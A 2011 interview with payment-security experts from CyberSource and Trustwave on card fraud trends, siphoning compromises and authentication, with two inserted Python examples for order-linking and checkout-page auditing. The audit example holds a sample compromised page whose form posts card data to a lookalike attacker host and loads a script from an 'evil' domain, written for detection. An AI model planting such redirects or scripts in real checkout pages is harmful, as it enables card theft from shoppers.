Interview

Joint Interview Series: Akif Khan, CyberSource & Ryan Jones, Trustwave

Wednesday 19 October 2011 13:06 CET | Editor: Melisande Mual | Interview

CyberSource, a wholly-owned subsidiary of Visa Inc., is a payment management company with over 330,000 customers worldwide. The company allows merchants to process online payments, streamline fraud management and simplify payment security. Dr Akif Khan is director, products and services, at CyberSource, and is an industry thought leader within the online payment and fraud space. He advises businesses globally about how to best address the latest e-commerce challenges experienced across multiple geographies and market sectors.

Trustwave is a leading provider of on-demand and

What are the key points that you have discussed at the MRC conference?

Akif Khan, CyberSource: The main objective of our presentation was to educate merchants on the strategies they can use to help protect sensitive payment data. Together with Trustwave, I elaborated on some of the key findings from our recent payment security survey, including key challenges and trends. We’d like to help merchants evaluate their current payment security thinking and benchmark their practices against peers, whilst also offering practical advice on areas of improvement.

Ryan Jones, Trustwave: I added my perspective around the findings of the report and will be applying case studies from data compromises I have personally investigated.

As far as the adoption of online fraud measures/sophisticated security systems is concerned, where do you think the main challenges come from?

Akif Khan, CyberSource: One of the main concerns we have seen from merchants relates to storing, protecting and securing their payment data. Interestingly there’s been a lot of focus on external threats, but the internal threats can pose just as significant a concern. Indeed, our recent payment security survey highlighted that just as many merchants perceived employees to be a security threat as hackers. Within an organisation, payment fraud data is exposed at many points in the order management process, from sales to the back-office. This must be addressed.

Ryan Jones, Trustwave: One of the key challenges is managing the current authentication and payments infrastructure in place. If a payments infrastructure was designed today with large budgets from scratch it would contain far stronger authentication and risk related information than the systems available to merchants today. However, this is not possible and we must ensure that the payment systems stay functional during security improvements. This balance of improvements with the necessary backwards compatibility poses real challenges for the industry as a whole.

The other key challenge is customer buy-in and, as a consequence, customer adoption. There are plenty of systems which could be rolled out to reduce fraud, but if it takes a commuter ten minutes to purchase a cappuccino then there is very little chance of adoption. The balance must be struck, and it can be hard to convince consumers that the problem is with the consumer side of the arrangement when there are high-profile information security compromises.

Cybercrime has become a rapidly growing phenomenon over recent years. In your opinion, where should mitigation efforts be focused and what can corporate and federal authorities do to slow down cybercrime?

Akif Khan, CyberSource: As Detective Superintendent Charlie McMurdie of the Police Central eCrime Unit (PCeU) reported in CyberSource’s 2011 UK Online Fraud Report, collaboration is key. In partnering with the likes of Europol and the Serious Organised Crime Agency (SOCA), they are able to share resources, intelligence and expertise. This, combined with the intelligence provided by businesses on suspected fraudsters, has helped enable the PCeU to identify and prosecute those responsible.

The multi-geographical nature of e-crime and its crossover with traditional crime means that it remains difficult to quantify. As such it is important to develop better methods of measuring and reporting such crimes to provide a more accurate picture of their impact. In doing so, we can better address the cybercrime challenge.


Ryan Jones, Trustwave: In order to operate in the modern world and take advantage of emerging technologies customers must share sensitive information with a vast number of organisations including companies and government departments. Some of the common data used for authentication is impossible to change (e.g. date of birth, government identification numbers and biometric information) and many other pieces of data are very difficult to change (e.g. address, telephone number, bank account number).

This approach of having your sensitive information, which is very difficult to change, stored in hundreds or thousands of databases worldwide, is a vulnerability. This is because, even if only one database is compromised, the number of databases holding your information increases the likelihood of your data being compromised.

As an industry we must develop technologies which allow us to authenticate our identities in both the online and offline worlds whilst reducing the value of this information. The more we authenticate with the same static information, the higher the risk. The tools for these authentication mechanisms have existed for years. The challenge is bringing these mechanisms to the public in a palatable and cost-effective way.


Much of the recent discussion in online retail has been around fraud prevention. What are the existing criminal trends related to card fraud and how can ID protection vendors mitigate them?

Akif Khan, CyberSource: Merchants report that they are increasingly seeing ‘cleaner fraud’—these are bad transactions which are hard to differentiate from good transactions, perpetrated by today’s most sophisticated fraudsters. To combat this level of fraud requires the latest anti-fraud tools. Merchants can, for example, utilise solutions that leverage device fingerprinting technology. How does this help? Well, many fraudsters place multiple orders from the same laptop, using different names, addresses and card numbers; using device fingerprinting they will know that all orders came from the same device, alerting them to the fraud attempt. Such tools should of course be used as part of a multi-pronged approach.
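The device-linking check described in the answer above, as an added example that is not part of the interview and is not CyberSource's or Trustwave's code. It assumes a checkout script has already collected a handful of device attributes per order (the attribute names, the `ORDERS` sample and the threshold of two identities per device are constructed for illustration):

```python
import hashlib
from collections import defaultdict

# Constructed sample data: two devices, five orders. Device A places three
# orders under three different names and card numbers, which is the pattern
# described in the interview; device B is an ordinary repeat customer.
DEVICE_A = {"ua": "Mozilla/5.0 (Windows NT 6.1) Firefox/7.0", "screen": "1366x768",
            "tz": "+0000", "lang": "en-GB", "plugins": "flash,java"}
DEVICE_B = {"ua": "Mozilla/5.0 (Macintosh) Safari/534.51", "screen": "1440x900",
            "tz": "+0100", "lang": "de-DE", "plugins": "flash"}

ORDERS = [
    {"order_id": "A1", "name": "J. Smith", "card_last4": "1111", "device": DEVICE_A},
    {"order_id": "A2", "name": "M. Jones", "card_last4": "2222", "device": DEVICE_A},
    {"order_id": "A3", "name": "P. Lee",   "card_last4": "3333", "device": DEVICE_A},
    {"order_id": "B1", "name": "A. Brown", "card_last4": "4444", "device": DEVICE_B},
    {"order_id": "B2", "name": "A. Brown", "card_last4": "4444", "device": DEVICE_B},
]


def device_fingerprint(attrs: dict) -> str:
    """Stable identifier for a device: a hash over the sorted attribute pairs,
    so the same attributes always yield the same fingerprint regardless of
    the order in which the collector emitted them."""
    material = "|".join(f"{key}={attrs[key]}" for key in sorted(attrs))
    return hashlib.sha256(material.encode("utf-8")).hexdigest()[:16]


def link_orders(orders, max_identities: int = 2) -> dict:
    """Group orders by device fingerprint and flag any device that has been
    used with more than `max_identities` distinct names or card numbers.
    Returns {fingerprint: [order_ids]} for the flagged devices only."""
    by_device = defaultdict(list)
    for order in orders:
        by_device[device_fingerprint(order["device"])].append(order)

    flagged = {}
    for fingerprint, group in by_device.items():
        names = {o["name"] for o in group}
        cards = {o["card_last4"] for o in group}
        if len(names) > max_identities or len(cards) > max_identities:
            flagged[fingerprint] = [o["order_id"] for o in group]
    return flagged


if __name__ == "__main__":
    for fingerprint, order_ids in link_orders(ORDERS).items():
        print(f"device {fingerprint}: {len(order_ids)} orders under different identities: {order_ids}")
```

Treat the result as one risk signal among several rather than an automatic decline: shared machines and common browser configurations produce legitimate collisions, and a fingerprint built from mutable attributes changes when the browser is updated.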


Ryan Jones, Trustwave: From a data gathering standpoint, in recent years we have seen a move from “smash and grab” compromises to “siphoning” compromises. “Smash and grab” compromises involved an attacker breaching the information security defenses of a system and then taking a copy of all the sensitive data in the database. The attack could be over in an hour and all the data has gone. Now we are seeing more “siphoning” compromises where each transaction, as it is processed, is saved and sent to a fraudster. There are two main reasons for this change in approach. The first is that the message is getting through – only store what you need – there are now fewer databases full of sensitive data. However, there is an advantage to the “siphoning” method for fraudsters; data languishing in a database goes stale – the data inserted 3 years ago is often incorrect and useless for fraudsters. If the fraudsters capture the data as it is processed it is “fresh” and the data is known to be valid.

To counter this there is pressure on companies to completely outsource this process of data collection to a third party who can devote the necessary resources to security. However, once this is done the company is often under no pressure to implement security controls internally. This can still leave a website vulnerable. An attacker could compromise the site and change the code so that, instead of redirecting the customer to the legitimate payment service provider, it redirects to an attacker's site. This site collects the data, then forwards it on to the legitimate provider so the payment goes through as expected, but then also saves the data for fraud purposes. This is where I believe a new technical fraud battleground will develop.
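One check a merchant can run against the redirect hijack described in the answer above, as an added example that is not part of the interview and is not Trustwave's or CyberSource's code. It audits a fetched copy of the checkout page for any form action, script, iframe or meta-refresh target that points outside an allowlist of payment-provider hosts. The allowlist, the two sample pages and the lookalike attacker host are constructed for illustration:

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: the only external hosts the checkout page may hand
# the customer, or their card data, to. The merchant's own relative URLs
# are always accepted.
ALLOWED_PAYMENT_HOSTS = {"secure.example-psp.com"}

# Constructed known-good checkout page.
GOOD_PAGE = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://secure.example-psp.com/js/tokenize.js"></script>
</head><body>
<form method="post" action="https://secure.example-psp.com/pay">
<input name="amount" value="19.99"></form>
</body></html>"""

# Constructed compromised page: the attacker has swapped the form action for a
# lookalike host and added a script of their own; the visible page is unchanged.
COMPROMISED_PAGE = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.evil.example/hook.js"></script>
</head><body>
<form method="post" action="https://secure.example-psp.com.evil.example/collect">
<input name="amount" value="19.99"></form>
</body></html>"""


class PaymentTargetExtractor(HTMLParser):
    """Collects every place the page can send the customer or their data."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.targets.append(("form", a["action"]))
        elif tag in ("script", "iframe") and a.get("src"):
            self.targets.append((tag, a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "5; url=https://host/path"
            content = a.get("content", "")
            if "url=" in content.lower():
                self.targets.append(("meta-refresh", content.split("=", 1)[1].strip()))


def audit_checkout_page(html: str, allowed_hosts: set) -> list:
    """Return (kind, url) for every target whose host is not on the allowlist.
    Relative URLs (no host) are the merchant's own and are skipped. Host
    comparison is exact, so 'secure.example-psp.com.evil.example' does not
    pass for 'secure.example-psp.com'."""
    parser = PaymentTargetExtractor()
    parser.feed(html)
    findings = []
    for kind, url in parser.targets:
        host = urlparse(url).hostname
        if host is None:
            continue
        if host not in allowed_hosts:
            findings.append((kind, url))
    return findings


def page_fingerprint(html: str) -> str:
    """Hash of the served page, for comparison against a stored baseline so
    that any edit to the checkout code is noticed, not only edits that add
    a foreign target."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    for label, page in (("good", GOOD_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(label, page_fingerprint(page)[:12], audit_checkout_page(page, ALLOWED_PAYMENT_HOSTS))
```

This catches the redirect and the extra script, but not a script that is modified in place to copy form fields to a second destination; for that the baseline hash comparison, a Content-Security-Policy restricting `form-action` and `script-src`, and Subresource Integrity on the provider's script are the complementary controls.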


What are the key trends in e-commerce and related fraud? Are they the same in all regions?

Akif Khan, CyberSource: eCommerce is evolving way beyond web commerce. Today there are many more potential customer touch points: mobile, apps, social media, interactive TV and more. This approach has its challenges: siloed systems, inconsistent user experiences, and costly parallel operations. Now that the various channels (such as smartphones, tablets, social networks, etc.) for eCommerce are more established, companies should consider a more consistent approach to unify these channels around a single infrastructure.

The same philosophy applies to fraud management, with today’s businesses requiring systems that work across multiple channels and geographies, are tailored for specific sectors and offer unified reporting.

Beefing up security for online card transactions via more authentication requirements seems to be an appropriate solution against online fraud, but if introduced, what are the effects on merchants/consumers attitude towards the online transaction process? Does the advent of new, simple and affordable technologies increase the threat of fraudulent activities? Will anti-fraud measures be able to keep up with improvements in technology?

Akif Khan, CyberSource: It’s clear that consumers are becoming increasingly savvy online; many are demanding some form of proof of security before proceeding with an online transaction.

Three quarters of those surveyed by McAfee said they would choose sites with trustmarks over those without, and four in ten online consumers claimed they would spend more online if they had a visual guarantee of security (i.e. SSL, padlock symbols, trustmarks etc.). Merchants should thus look to provide a consistent, robust and trustworthy online payment mechanism that meets consumers’ demands. That said, it’s worth noting that customer sentiment towards online security needs to be balanced against their desire to get through the payment process quickly and easily.

Much has been written about the potential impact cybercrime (in its various forms) could have on consumers, but online businesses are just as vulnerable to being targeted by fraudsters. In this context, what measures should businesses implement to respond effectively to the growing exploitation of the internet by organized criminals?

Akif Khan, CyberSource: The biggest impact for merchants is the impact it has on consumers. In today’s highly competitive environment, brand and reputation are everything. Not surprisingly, the very public data breach incidents can be extremely damaging.

From a payment security perspective, my view is that merchants can help protect themselves by not storing, handling or touching sensitive payment data. In utilising a tokenisation system, merchants can still offer their customers a seamless shopping experience, yet they don’t need to store any of the payment data.

From a fraud perspective, it is vital to address the challenge of cleaner fraud. Today’s organised gangs are very sophisticated, and operate across multiple geographies and sectors. To address the challenge, merchants should firstly utilise the latest anti-fraud tools. Secondly, data is key. Organised crime has no boundaries, so merchants should strive to use solutions that allow them to benefit from global transaction databases—such systems analyse suspicious transactions across multiple organisations, not just the merchant’s own business.

Ryan Jones, Trustwave: Businesses often play two roles with fraudulent use of data. The first is holding sensitive data which can be compromised. Then this information is often provided to another company in order to defraud. The first company, with poor information security controls, often suffers very little damage; if the data compromise is not made public then a small amount of internal cleanup is often enough to contain the problem. However, it is the second, defrauded company which bears the brunt of the compromised company’s weak security.

It is important that as an industry we recognise the importance of not just the last step of the fraudsters – the fraud itself – but we address all the steps of the fraud. Without the sensitive data in the first place it wouldn’t be possible to defraud the merchants.

Giving compromised merchants the right forum to disclose any information security breaches and allowing this to occur without intense negative repercussions for the discloser could give us the tools we need to address the attempts at fraud. By marrying the known compromised data with the actions of attackers we can vastly improve our fraud tracking and blocking mechanisms.

The future of fraud prevention will largely depend on …

Akif Khan, CyberSource: …how we respond to the rapidly evolving nature of eCommerce. I see convergence being driven at the back-end and divergence at the front-end, courtesy of the many touch points that consumers now have with merchants. My role is to take the complexity out of such evolution, offering businesses a simple, secure and unified way of growing their eCommerce operations, irrespective of channel, geography and sector.

Ryan Jones, Trustwave: …all parties, once incentivised to do so, pulling in the same direction. We must ensure that as an industry:
• Compromised data is disclosed to enable fraud reduction action to be taken
• Data which is used for authentication can be devalued
• We minimise loopholes driven by the need for backwards compatibility
This means:
• Building a platform for knowledge sharing
• Reducing the stigma of a data compromise – data compromise disclosure laws do a great job of this
• Redesigning our authentication systems to not be based on shared ‘secrets’ which must be shared with hundreds of organisations
• Redesigning our authentication systems so that authentication information can be revoked when compromised
• Minimising the trust given to deprecated methods of authentication
Keywords: Akif Khan, CyberSource, Ryan Jones, Trustwave, online payment, e-commerce, security, online fraud, The Merchant Risk Council, EMEA